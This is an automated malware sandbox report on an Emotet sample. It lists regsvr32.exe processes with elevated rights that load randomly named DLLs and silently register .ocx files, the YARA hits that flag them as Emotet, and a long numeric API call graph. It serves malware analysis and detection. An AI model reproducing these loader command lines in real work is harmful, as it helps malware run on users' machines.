                                                    Start time:09:18:36
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\MTAKuNEHAAsvRsb\hgVDSaDXChbCzdU.dll"
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1240847022.0000000001FE0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.1241152796.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    Target ID:7
                                                    Start time:09:18:38
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.953530856.00000000003D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.953780664.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    Target ID:8
                                                    Start time:09:18:41
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\GistaKepWrpVA\oAaDhgd.dll"
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Yara matches:
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1240649290.00000000001D0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000008.00000002.1241141714.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                    Reputation:high

                                                    Target ID:9
                                                    Start time:09:18:44
                                                    Start date:23/05/2022
                                                    Path:C:\Windows\System32\regsvr32.exe
                                                    Wow64 process (32bit):false
                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                                                    Imagebase:0xfff60000
                                                    File size:19456 bytes
                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:high


                                                      Execution Graph

                                                      Execution Coverage:6.7%
                                                      Dynamic/Decrypted Code Coverage:2.5%
                                                      Signature Coverage:10%
                                                      Total number of Nodes:1905
                                                      Total number of Limit Nodes:30
7fef9d33a42 16925->16927 16928 7fef9d2be50 terminate 14 API calls 16925->16928 16926->16925 16929 7fef9d27090 _exit 33 API calls 16927->16929 16928->16927 16930 7fef9d2cf78 16929->16930 16930->16910 16931->16924 17428 7fef9d23909 17429 7fef9d23913 __SehTransFilter 17428->17429 17430 7fef9d239db __SehTransFilter 17429->17430 17431 7fef9d23a71 RtlUnwindEx 17429->17431 17431->17430 17920 7fef9d23409 17921 7fef9d23e00 3 API calls 17920->17921 17922 7fef9d2340e 17921->17922 17925 7fef9d288d0 HeapDestroy 17922->17925 17924 7fef9d23413 17925->17924 18488 7fef9d3c30d 18489 7fef9d3c31a get_int64_arg _get_printf_count_output 18488->18489 18490 7fef9d3c39d 18489->18490 18491 7fef9d3c3f2 18489->18491 18493 7fef9d2bd70 _invalid_parameter 17 API calls 18490->18493 18494 7fef9d3b99c 18491->18494 18499 7fef9d3b530 wctomb_s 19 API calls 18491->18499 18492 7fef9d3cc93 18495 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 18492->18495 18498 7fef9d2bd70 _invalid_parameter 17 API calls 18492->18498 18493->18495 18494->18492 18500 7fef9d3bada 18494->18500 18496 7fef9d23280 __GSHandlerCheck 8 API calls 18495->18496 18497 7fef9d3cd90 18496->18497 18498->18495 18499->18491 18501 7fef9d2bd70 _invalid_parameter 17 API calls 18500->18501 18501->18495 16384 7fef9d23d30 16402 7fef9d27540 16384->16402 16389 7fef9d23d4e FlsAlloc 16392 7fef9d23d73 _calloc_dbg 16389->16392 16393 7fef9d23d6a 16389->16393 16390 7fef9d23d42 16391 7fef9d23e00 3 API calls 16390->16391 16399 7fef9d23d47 16391->16399 16395 7fef9d23da4 FlsSetValue 16392->16395 16396 7fef9d23db9 16392->16396 16394 7fef9d23e00 3 API calls 16393->16394 16394->16399 16395->16396 16397 7fef9d23dc2 16395->16397 16398 7fef9d23e00 3 API calls 16396->16398 16411 7fef9d23e30 16397->16411 16398->16399 16417 7fef9d23d00 RtlEncodePointer 16402->16417 16404 7fef9d27549 _initp_misc_winsig 16418 7fef9d2cf20 EncodePointer 16404->16418 16406 7fef9d23d39 16407 7fef9d28fe0 16406->16407 16408 7fef9d28ff6 16407->16408 16409 7fef9d23d3e 16408->16409 16410 7fef9d29022 
InitializeCriticalSectionAndSpinCount 16408->16410 16409->16389 16409->16390 16410->16408 16410->16409 16412 7fef9d23ead 16411->16412 16419 7fef9d29360 LeaveCriticalSection 16412->16419 16414 7fef9d23ec7 _updatetlocinfoEx_nolock 16420 7fef9d29360 LeaveCriticalSection 16414->16420 16416 7fef9d23dce GetCurrentThreadId 16416->16399 16417->16404 16418->16406 16419->16414 16420->16416 17432 7fef9d23130 17433 7fef9d23170 __GSHandlerCheck 8 API calls 17432->17433 17434 7fef9d23160 17433->17434 17926 7fef9d2e830 17927 7fef9d2e857 17926->17927 17928 7fef9d33cc0 __SehTransFilter 39 API calls 17927->17928 17929 7fef9d2e8e3 17928->17929 17930 7fef9d3c435 17931 7fef9d3c479 _CrtMemDumpAllObjectsSince 17930->17931 17932 7fef9d3c598 DecodePointer 17931->17932 17933 7fef9d3c60d _CrtMemDumpAllObjectsSince 17932->17933 17934 7fef9d3c62b DecodePointer 17933->17934 17935 7fef9d3c652 _CrtMemDumpAllObjectsSince 17933->17935 17934->17935 17936 7fef9d3c676 DecodePointer 17935->17936 17946 7fef9d3c69d std::exception::_Copy_str 17935->17946 17936->17946 17937 7fef9d3b99c 17938 7fef9d3cc93 17937->17938 17943 7fef9d3bada 17937->17943 17939 7fef9d2bd70 _invalid_parameter 17 API calls 17938->17939 17941 7fef9d3bb0e _LocaleUpdate::~_LocaleUpdate 17938->17941 17939->17941 17940 7fef9d3b530 wctomb_s 19 API calls 17940->17946 17942 7fef9d23280 __GSHandlerCheck 8 API calls 17941->17942 17944 7fef9d3cd90 17942->17944 17945 7fef9d2bd70 _invalid_parameter 17 API calls 17943->17945 17945->17941 17946->17937 17946->17940 16430 7fef9d23433 16431 7fef9d23437 16430->16431 16435 7fef9d23446 16430->16435 16432 7fef9d27d00 _ioterm DeleteCriticalSection 16431->16432 16433 7fef9d2343c 16432->16433 16434 7fef9d23e00 3 API calls 16433->16434 16436 7fef9d23441 16434->16436 16438 7fef9d288d0 HeapDestroy 16436->16438 16438->16435 17947 7fef9d3d830 17948 7fef9d3d8aa 17947->17948 17949 7fef9d3d926 17948->17949 17950 7fef9d3d97b 17948->17950 17951 7fef9d2bd70 _invalid_parameter 17 API calls 17949->17951 17952 7fef9d3d9ee 
17950->17952 17959 7fef9d3da43 17950->17959 17955 7fef9d3d95a _LocaleUpdate::~_LocaleUpdate 17951->17955 17953 7fef9d2bd70 _invalid_parameter 17 API calls 17952->17953 17953->17955 17954 7fef9d23280 __GSHandlerCheck 8 API calls 17956 7fef9d3ed9e 17954->17956 17955->17954 17957 7fef9d3eca1 17957->17955 17958 7fef9d2bd70 _invalid_parameter 17 API calls 17957->17958 17958->17955 17959->17957 17960 7fef9d3dbb5 17959->17960 17961 7fef9d2bd70 _invalid_parameter 17 API calls 17960->17961 17961->17955 17962 7fef9d26c32 17963 7fef9d26c3c 17962->17963 17964 7fef9d26e25 _LocaleUpdate::~_LocaleUpdate 17963->17964 17966 7fef9d26c7a _CrtMemDumpAllObjectsSince 17963->17966 17965 7fef9d23280 __GSHandlerCheck 8 API calls 17964->17965 17967 7fef9d26e89 17965->17967 17968 7fef9d2c260 _CrtMemDumpAllObjectsSince_stat 3 API calls 17966->17968 17969 7fef9d26ce0 _CrtMemDumpAllObjectsSince _CrtMemDumpAllObjectsSince_stat 17966->17969 17968->17969 17970 7fef9d2c0c0 _swprintf_p 17 API calls 17969->17970 17972 7fef9d26dc7 17970->17972 17971 7fef9d26e12 17972->17971 17973 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17972->17973 17973->17971 16941 7fef9d33e3b 16942 7fef9d33ec7 16941->16942 16945 7fef9d2e790 16942->16945 16952 7fef9d2e500 16945->16952 16949 7fef9d2e7d0 __SehTransFilter 16960 7fef9d34f20 16949->16960 16951 7fef9d2e81e 16953 7fef9d33b40 __StateFromControlPc 36 API calls 16952->16953 16955 7fef9d2e539 16953->16955 16954 7fef9d2e601 16957 7fef9d33b40 16954->16957 16955->16954 16956 7fef9d2e5c2 RtlLookupFunctionEntry 16955->16956 16956->16954 16967 7fef9d33a60 16957->16967 16973 7fef9d33b70 16960->16973 16962 7fef9d34f55 __SehTransFilter _SetImageBase __SetState 16963 7fef9d2cf80 _inconsistency 36 API calls 16962->16963 16964 7fef9d35103 16962->16964 16963->16962 16965 7fef9d3514a __SetState 16964->16965 16966 7fef9d2cf80 _inconsistency 36 API calls 16964->16966 16965->16951 16966->16965 16968 7fef9d33a7b 16967->16968 16969 7fef9d33a7d 16967->16969 16971 7fef9d2cf80 
_inconsistency 36 API calls 16968->16971 16972 7fef9d33aa5 16968->16972 16970 7fef9d2cf80 _inconsistency 36 API calls 16969->16970 16970->16968 16971->16972 16972->16949 16974 7fef9d33b9a 16973->16974 16976 7fef9d33ba9 16973->16976 16975 7fef9d33b40 __StateFromControlPc 36 API calls 16974->16975 16975->16976 16976->16962 16460 18001a10c 16461 18001a166 16460->16461 16464 180024f28 16461->16464 16463 18001a335 16466 180024fcb 16464->16466 16465 18002506a CreateProcessW 16465->16463 16466->16465 17974 7fef9d2443c 17975 7fef9d2444c 17974->17975 17978 7fef9d29360 LeaveCriticalSection 17975->17978 17977 7fef9d248be 17978->17977 17455 7fef9d39939 17456 7fef9d39951 __doserrno 17455->17456 17457 7fef9d2bd70 _invalid_parameter 17 API calls 17456->17457 17458 7fef9d399d7 17457->17458 17459 7fef9d23280 __GSHandlerCheck 8 API calls 17458->17459 17460 7fef9d3a9f5 17459->17460 17979 7fef9d3e424 17980 7fef9d3e469 _CrtMemDumpAllObjectsSince 17979->17980 17981 7fef9d3e588 DecodePointer 17980->17981 17982 7fef9d3e5fd _CrtMemDumpAllObjectsSince 17981->17982 17983 7fef9d3e642 _CrtMemDumpAllObjectsSince 17982->17983 17984 7fef9d3e61b DecodePointer 17982->17984 17985 7fef9d3e666 DecodePointer 17983->17985 17987 7fef9d3e68d std::exception::_Copy_str 17983->17987 17984->17983 17985->17987 17986 7fef9d3eadf 17989 7fef9d3ef10 25 API calls 17986->17989 17987->17986 17988 7fef9d3eec0 25 API calls 17987->17988 17996 7fef9d3da75 17987->17996 17988->17986 17990 7fef9d3eafd 17989->17990 17991 7fef9d3eb33 17990->17991 17995 7fef9d3eec0 25 API calls 17990->17995 17992 7fef9d3ec29 17991->17992 18006 7fef9d3eb49 _CrtMemDumpAllObjectsSince 17991->18006 17993 7fef9d3ebda 17992->17993 17994 7fef9d3ef10 25 API calls 17992->17994 17993->17996 17999 7fef9d3eec0 25 API calls 17993->17999 17994->17993 17995->17991 17997 7fef9d3eca1 17996->17997 18002 7fef9d3dbb5 17996->18002 17998 7fef9d2bd70 _invalid_parameter 17 API calls 17997->17998 18000 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 17997->18000 
17998->18000 17999->17996 18001 7fef9d23280 __GSHandlerCheck 8 API calls 18000->18001 18003 7fef9d3ed9e 18001->18003 18005 7fef9d2bd70 _invalid_parameter 17 API calls 18002->18005 18004 7fef9d3f000 wcsxfrm 2 API calls 18004->18006 18005->18000 18006->17993 18006->18004 18007 7fef9d3ee40 25 API calls 18006->18007 18007->18006 16977 7fef9d25a25 16978 7fef9d25a37 16977->16978 16979 7fef9d2bd70 _invalid_parameter 17 API calls 16978->16979 16980 7fef9d25aaf 16979->16980 17461 7fef9d34920 17464 7fef9d3d530 17461->17464 17467 7fef9d3d580 17464->17467 17468 7fef9d3493d 17467->17468 17469 7fef9d3d59a std::exception::_Tidy 17467->17469 17469->17468 17471 7fef9d3d660 17469->17471 17472 7fef9d3d676 std::exception::_Copy_str malloc 17471->17472 17474 7fef9d3d6bf 17471->17474 17473 7fef9d2d490 std::exception::_Copy_str 17 API calls 17472->17473 17472->17474 17473->17474 17474->17468 18510 7fef9d29328 18511 7fef9d29336 EnterCriticalSection 18510->18511 18512 7fef9d2932c 18510->18512 18512->18511 18513 7fef9d3ff2d 18514 7fef9d3ff37 18513->18514 18515 7fef9d40042 18514->18515 18516 7fef9d3ff47 18514->18516 18528 7fef9d29360 LeaveCriticalSection 18515->18528 18517 7fef9d4003d 18516->18517 18520 7fef9d3ae90 _lock_file2 EnterCriticalSection 18516->18520 18519 7fef9d4004c 18521 7fef9d3ff97 18520->18521 18522 7fef9d3ffd0 18521->18522 18524 7fef9d3ffe1 18521->18524 18525 7fef9d3ffbb 18521->18525 18523 7fef9d3af60 _unlock_file2 2 API calls 18522->18523 18523->18517 18524->18522 18527 7fef9d3fd70 _fflush_nolock 25 API calls 18524->18527 18526 7fef9d3fd70 _fflush_nolock 25 API calls 18525->18526 18526->18522 18527->18522 18528->18519 17479 7fef9d2b12b 17480 7fef9d2b14c 17479->17480 17481 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 17480->17481 17483 7fef9d2b2e0 17480->17483 17481->17483 17482 7fef9d2b33e 17495 7fef9d30cc0 17482->17495 17483->17482 17484 7fef9d2d490 std::exception::_Copy_str 17 API calls 17483->17484 17486 7fef9d2b311 17484->17486 17488 7fef9d27ff0 
_invoke_watson_if_error 16 API calls 17486->17488 17488->17482 17489 7fef9d2b37d 17492 7fef9d23280 __GSHandlerCheck 8 API calls 17489->17492 17490 7fef9d2cff0 terminate 34 API calls 17491 7fef9d2b373 17490->17491 17493 7fef9d27090 _exit 33 API calls 17491->17493 17494 7fef9d2b3a0 17492->17494 17493->17489 17513 7fef9d23d00 RtlEncodePointer 17495->17513 17497 7fef9d30cf6 17498 7fef9d30d23 LoadLibraryW 17497->17498 17499 7fef9d30e15 17497->17499 17501 7fef9d30d44 GetProcAddress 17498->17501 17511 7fef9d30d3d 17498->17511 17500 7fef9d30e68 17499->17500 17503 7fef9d30e39 DecodePointer DecodePointer 17499->17503 17505 7fef9d30eed DecodePointer 17500->17505 17506 7fef9d30f0d 17500->17506 17512 7fef9d30ec8 17500->17512 17502 7fef9d30d6a 7 API calls 17501->17502 17501->17511 17502->17499 17507 7fef9d30df3 GetProcAddress EncodePointer 17502->17507 17503->17500 17504 7fef9d30f60 DecodePointer 17504->17511 17505->17506 17506->17504 17510 7fef9d30f2f DecodePointer 17506->17510 17507->17499 17508 7fef9d23280 __GSHandlerCheck 8 API calls 17509 7fef9d2b358 17508->17509 17509->17489 17509->17490 17510->17504 17510->17512 17511->17508 17512->17504 17513->17497 17514 7fef9d234d5 17515 7fef9d234da _calloc_dbg 17514->17515 17516 7fef9d2350b FlsSetValue 17515->17516 17520 7fef9d23548 17515->17520 17517 7fef9d23520 17516->17517 17516->17520 17518 7fef9d23e30 LeaveCriticalSection 17517->17518 17519 7fef9d2352c GetCurrentThreadId 17518->17519 17519->17520 18529 7fef9d25ad9 18530 7fef9d25add 18529->18530 18531 7fef9d26380 _CrtIsValidHeapPointer HeapValidate 18530->18531 18532 7fef9d25b3a 18531->18532 18535 7fef9d29360 LeaveCriticalSection 18532->18535 18534 7fef9d25c14 18535->18534 18008 7fef9d233d6 18011 7fef9d288d0 HeapDestroy 18008->18011 18010 7fef9d233db 18011->18010 18547 7fef9d266da 18548 7fef9d26725 18547->18548 18550 7fef9d26745 18547->18550 18548->18550 18553 7fef9d29a70 18548->18553 18551 7fef9d2677f 18550->18551 18552 7fef9d29b10 __updatetmbcinfo LeaveCriticalSection 
18550->18552 18552->18551 18554 7fef9d29a79 _updatetlocinfoEx_nolock 18553->18554 18556 7fef9d29ad8 18554->18556 18557 7fef9d29360 LeaveCriticalSection 18554->18557 18556->18550 18557->18556 17521 7fef9d268c4 17522 7fef9d268d1 17521->17522 17523 7fef9d26ba6 17522->17523 17525 7fef9d268ed _CrtIsValidPointer 17522->17525 17539 7fef9d29360 LeaveCriticalSection 17523->17539 17527 7fef9d2695e IsBadReadPtr 17525->17527 17528 7fef9d26976 17525->17528 17537 7fef9d2692f 17525->17537 17526 7fef9d26bb0 17527->17528 17529 7fef9d26ad2 17528->17529 17530 7fef9d26a29 17528->17530 17533 7fef9d26b2d 17529->17533 17534 7fef9d26add 17529->17534 17531 7fef9d26abe 17530->17531 17532 7fef9d26a86 IsBadReadPtr 17530->17532 17536 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17531->17536 17532->17531 17532->17537 17533->17537 17538 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17533->17538 17535 7fef9d26bf0 _CrtMemDumpAllObjectsSince_stat 20 API calls 17534->17535 17535->17537 17536->17537 17538->17537 17539->17526 18558 7fef9d376c0 18559 7fef9d376cf _CrtMemDumpAllObjectsSince 18558->18559 18560 7fef9d37be3 _CrtMemDumpAllObjectsSince 18558->18560 18562 7fef9d37905 _CrtMemDumpAllObjectsSince 18559->18562 18563 7fef9d377f5 _CrtMemDumpAllObjectsSince wcsncnt 18559->18563 18571 7fef9d376e6 _LocaleUpdate::~_LocaleUpdate 18559->18571 18561 7fef9d37cc6 WideCharToMultiByte 18560->18561 18560->18571 18561->18571 18565 7fef9d3790f WideCharToMultiByte 18562->18565 18568 7fef9d37827 WideCharToMultiByte 18563->18568 18564 7fef9d23280 __GSHandlerCheck 8 API calls 18566 7fef9d37d85 18564->18566 18567 7fef9d37965 18565->18567 18569 7fef9d3799a GetLastError 18567->18569 18567->18571 18568->18571 18569->18571 18572 7fef9d379d3 _CrtMemDumpAllObjectsSince 18569->18572 18570 7fef9d37a05 WideCharToMultiByte 18570->18571 18570->18572 18571->18564 18572->18570 18572->18571 18024 7fef9d2f7f1 18025 7fef9d2f80d 18024->18025 18044 7fef9d2f8de _wcsftime_l 18024->18044 18081 7fef9d36fb0 
18025->18081 18028 7fef9d2fa70 18088 7fef9d369c0 18028->18088 18029 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18032 7fef9d2f85a OutputDebugStringA 18029->18032 18031 7fef9d2f9f4 18031->18028 18034 7fef9d2d490 std::exception::_Copy_str 17 API calls 18031->18034 18035 7fef9d2f872 OutputDebugStringA OutputDebugStringA OutputDebugStringA OutputDebugStringA 18032->18035 18033 7fef9d2fa8a 18036 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18033->18036 18037 7fef9d2fa43 18034->18037 18041 7fef9d2f8ce 18035->18041 18039 7fef9d2fab7 18036->18039 18040 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18037->18040 18042 7fef9d2fb24 18039->18042 18045 7fef9d369c0 17 API calls 18039->18045 18057 7fef9d2fb6a 18039->18057 18040->18028 18049 7fef9d23280 __GSHandlerCheck 8 API calls 18041->18049 18043 7fef9d369c0 17 API calls 18042->18043 18046 7fef9d2fb3d 18043->18046 18044->18031 18050 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18044->18050 18051 7fef9d2f996 18044->18051 18047 7fef9d2faf7 18045->18047 18048 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18046->18048 18052 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18047->18052 18048->18057 18053 7fef9d3011d 18049->18053 18050->18051 18051->18031 18054 7fef9d2d490 std::exception::_Copy_str 17 API calls 18051->18054 18052->18042 18055 7fef9d2f9c7 18054->18055 18056 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18055->18056 18056->18031 18058 7fef9d2fc39 18057->18058 18060 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18057->18060 18059 7fef9d2fc97 18058->18059 18061 7fef9d2d490 std::exception::_Copy_str 17 API calls 18058->18061 18101 7fef9d36970 18059->18101 18060->18058 18062 7fef9d2fc6a 18061->18062 18064 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18062->18064 18064->18059 18066 7fef9d26ea0 _invoke_watson_if_oneof 16 API calls 18067 7fef9d2fd6e 18066->18067 18068 7fef9d31640 17 API calls 18067->18068 18076 7fef9d2fdbb 18067->18076 18069 7fef9d2fd8e 18068->18069 18070 7fef9d27ff0 
_invoke_watson_if_error 16 API calls 18069->18070 18070->18076 18071 7fef9d2ffef 18073 7fef9d30008 OutputDebugStringA 18071->18073 18074 7fef9d30016 18071->18074 18072 7fef9d2ff03 std::exception::_Copy_str 18072->18041 18072->18071 18077 7fef9d2ffaa WriteFile 18072->18077 18073->18074 18074->18041 18078 7fef9d36fb0 _itow_s 17 API calls 18074->18078 18076->18072 18104 7fef9d29360 LeaveCriticalSection 18076->18104 18077->18071 18079 7fef9d30065 18078->18079 18080 7fef9d27ff0 _invoke_watson_if_error 16 API calls 18079->18080 18080->18041 18082 7fef9d37003 18081->18082 18083 7fef9d36fd6 18081->18083 18084 7fef9d37030 _itow_s 17 API calls 18082->18084 18083->18082 18085 7fef9d36fdd 18083->18085 18087 7fef9d2f82d 18084->18087 18105 7fef9d37030 18085->18105 18087->18029 18089 7fef9d369e1 18088->18089 18090 7fef9d36a42 18089->18090 18092 7fef9d36a80 _calloc_dbg_impl 18089->18092 18091 7fef9d2bd70 _invalid_parameter 17 API calls 18090->18091 18097 7fef9d36a76 _calloc_dbg_impl 18091->18097 18093 7fef9d36b6e 18092->18093 18094 7fef9d36bac _calloc_dbg_impl 18092->18094 18095 7fef9d2bd70 _invalid_parameter 17 API calls 18093->18095 18096 7fef9d36ce8 18094->18096 18099 7fef9d36d26 _calloc_dbg_impl 18094->18099 18095->18097 18098 7fef9d2bd70 _invalid_parameter 17 API calls 18096->18098 18097->18033 18098->18097 18099->18097 18100 7fef9d2bd70 _invalid_parameter 17 API calls 18099->18100 18100->18097 18121 7fef9d363e0 18101->18121 18103 7fef9d2fd20 18103->18066 18104->18072 18106 7fef9d37055 18105->18106 18107 7fef9d370ab 18106->18107 18109 7fef9d370e9 18106->18109 18108 7fef9d2bd70 _invalid_parameter 17 API calls 18107->18108 18118 7fef9d370df 18108->18118 18110 7fef9d3714a 18109->18110 18112 7fef9d37188 _calloc_dbg_impl 18109->18112 18111 7fef9d2bd70 _invalid_parameter 17 API calls 18110->18111 18111->18118 18113 7fef9d37287 18112->18113 18116 7fef9d372c5 18112->18116 18114 7fef9d2bd70 _invalid_parameter 17 API calls 18113->18114 18114->18118 18115 7fef9d37338 18117 7fef9d2bd70 
_invalid_parameter 17 API calls 18115->18117 18116->18115 18119 7fef9d37376 18116->18119 18117->18118 18118->18087 18119->18118 18120 7fef9d2bd70 _invalid_parameter 17 API calls 18119->18120 18120->18118 18122 7fef9d3640e 18121->18122 18123 7fef9d3648e 18122->18123 18125 7fef9d364cc _calloc_dbg_impl 18122->18125 18124 7fef9d2bd70 _invalid_parameter 17 API calls 18123->18124 18131 7fef9d364c2 _calloc_dbg_impl _LocaleUpdate::~_LocaleUpdate 18124->18131 18126 7fef9d3668e _CrtMemDumpAllObjectsSince 18125->18126 18127 7fef9d3663f 18125->18127 18133 7fef9d35ea0 18126->18133 18128 7fef9d2bd70 _invalid_parameter 17 API calls 18127->18128 18128->18131 18130 7fef9d366b5 _calloc_dbg_impl 18130->18131 18132 7fef9d2bd70 _invalid_parameter 17 API calls 18130->18132 18131->18103 18132->18131 18134 7fef9d35ecf 18133->18134 18135 7fef9d35fae 18134->18135 18136 7fef9d35f6e 18134->18136 18143 7fef9d35eda std::exception::_Copy_str _LocaleUpdate::~_LocaleUpdate 18134->18143 18138 7fef9d35fcf _CrtMemDumpAllObjectsSince 18135->18138 18139 7fef9d362e1 _CrtMemDumpAllObjectsSince 18135->18139 18137 7fef9d2bd70 _invalid_parameter 17 API calls 18136->18137 18137->18143 18141 7fef9d360a1 MultiByteToWideChar 18138->18141 18138->18143 18140 7fef9d3632f MultiByteToWideChar 18139->18140 18139->18143 18140->18143 18142 7fef9d3610e GetLastError 18141->18142 18141->18143 18142->18143 18144 7fef9d36154 _CrtMemDumpAllObjectsSince wcsxfrm 18142->18144 18143->18130 18144->18143 18145 7fef9d36238 MultiByteToWideChar 18144->18145 18145->18143 16439 7fef9d26ff2 16440 7fef9d26ffe 16439->16440 16443 7fef9d2ca00 16440->16443 16442 7fef9d27011 _initterm_e 16444 7fef9d2ca0e 16443->16444 16445 7fef9d2ca23 EncodePointer 16444->16445 16446 7fef9d2ca4b 16444->16446 16445->16444 16446->16442 18615 7fef9d3e2fc 18616 7fef9d3e309 get_int64_arg _get_printf_count_output 18615->18616 18617 7fef9d3e38c 18616->18617 18618 7fef9d3e3e1 18616->18618 18622 7fef9d2bd70 _invalid_parameter 17 API calls 18617->18622 18619 
7fef9d3eadf 18618->18619 18620 7fef9d3eec0 25 API calls 18618->18620 18629 7fef9d3da75 18618->18629 18621 7fef9d3ef10 25 API calls 18619->18621 18620->18619 18624 7fef9d3eafd 18621->18624 18638 7fef9d3dbe9 _LocaleUpdate::~_LocaleUpdate 18622->18638 18623 7fef9d3eb33 18625 7fef9d3ec29 18623->18625 18639 7fef9d3eb49 _CrtMemDumpAllObjectsSince 18623->18639 18624->18623 18628 7fef9d3eec0 25 API calls 18624->18628 18626 7fef9d3ebda 18625->18626 18627 7fef9d3ef10 25 API calls 18625->18627 18626->18629 18634 7fef9d3eec0 25 API calls 18626->18634 18627->18626 18628->18623 18631 7fef9d3eca1 18629->18631 18635 7fef9d3dbb5 18629->18635 18630 7fef9d23280 __GSHandlerCheck 8 API calls 18632 7fef9d3ed9e 18630->18632 18633 7fef9d2bd70 _invalid_parameter 17 API calls 18631->18633 18631->18638 18633->18638 18634->18629 18637 7fef9d2bd70 _invalid_parameter 17 API calls 18635->18637 18636 7fef9d3f000 wcsxfrm 2 API calls 18636->18639 18637->18638 18638->18630 18639->18626 18639->18636 18640 7fef9d3ee40 25 API calls 18639->18640 18640->18639 18146 7fef9d253fb 18147 7fef9d2541d _realloc_dbg 18146->18147 18149 7fef9d25421 18147->18149 18152 7fef9d26380 18147->18152 18150 7fef9d254de _calloc_dbg_impl _realloc_dbg 18151 7fef9d2c020 _free_base 2 API calls 18150->18151 18151->18149 18153 7fef9d26391 18152->18153 18154 7fef9d26395 _CrtIsValidPointer 18152->18154 18153->18150 18154->18153 18155 7fef9d263b6 HeapValidate 18154->18155 18155->18153 16472 7fef9d235e1 16473 7fef9d235ea 16472->16473 16474 7fef9d235f1 16472->16474 16474->16473 16478 7fef9d212b0 16474->16478 16477 7fef9d212b0 14 API calls 16477->16473 16479 7fef9d212de CoLoadLibrary 16478->16479 16484 7fef9d22f8c 16478->16484 16481 7fef9d22f0f MessageBoxA ExitProcess 16479->16481 16482 7fef9d22f2e VirtualAlloc RtlAllocateHeap 16479->16482 16480 7fef9d23280 __GSHandlerCheck 8 API calls 16485 7fef9d230ff 16480->16485 16483 7fef9d22f73 _calloc_dbg_impl 16482->16483 16482->16484 16486 7fef9d22f83 CoTaskMemFree 16483->16486 16484->16480 
16485->16473 16485->16477 16486->16484 18156 7fef9d23fe1 18157 7fef9d23fea SetLastError 18156->18157 16487 7fef9d27de0 16488 7fef9d27ded 16487->16488 16492 7fef9d27df2 std::exception::_Copy_str _calloc_dbg 16487->16492 16494 7fef9d2aa40 16488->16494 16490 7fef9d27e0e 16492->16490 16498 7fef9d2d490 16492->16498 16508 7fef9d27ff0 16492->16508 16495 7fef9d2aa57 16494->16495 16496 7fef9d2aa4d 16494->16496 16495->16492 16512 7fef9d29c10 16496->16512 16500 7fef9d2d4b1 16498->16500 16499 7fef9d2d512 16501 7fef9d2bd70 _invalid_parameter 17 API calls 16499->16501 16500->16499 16502 7fef9d2d550 _calloc_dbg_impl 16500->16502 16504 7fef9d2d546 _calloc_dbg_impl 16501->16504 16503 7fef9d2d63e 16502->16503 16506 7fef9d2d67c _calloc_dbg_impl 16502->16506 16505 7fef9d2bd70 _invalid_parameter 17 API calls 16503->16505 16504->16492 16505->16504 16506->16504 16507 7fef9d2bd70 _invalid_parameter 17 API calls 16506->16507 16507->16504 16509 7fef9d28010 16508->16509 16510 7fef9d2800e 16508->16510 16511 7fef9d2be00 _invoke_watson_if_oneof 16 API calls 16509->16511 16510->16492 16511->16510 16513 7fef9d29c2a 16512->16513 16522 7fef9d29b10 16513->16522 16515 7fef9d29c34 16526 7fef9d29f20 16515->16526 16517 7fef9d29c51 16519 7fef9d29ecd 16517->16519 16532 7fef9d2a000 16517->16532 16519->16495 16520 7fef9d29ce8 16520->16519 16545 7fef9d29360 LeaveCriticalSection 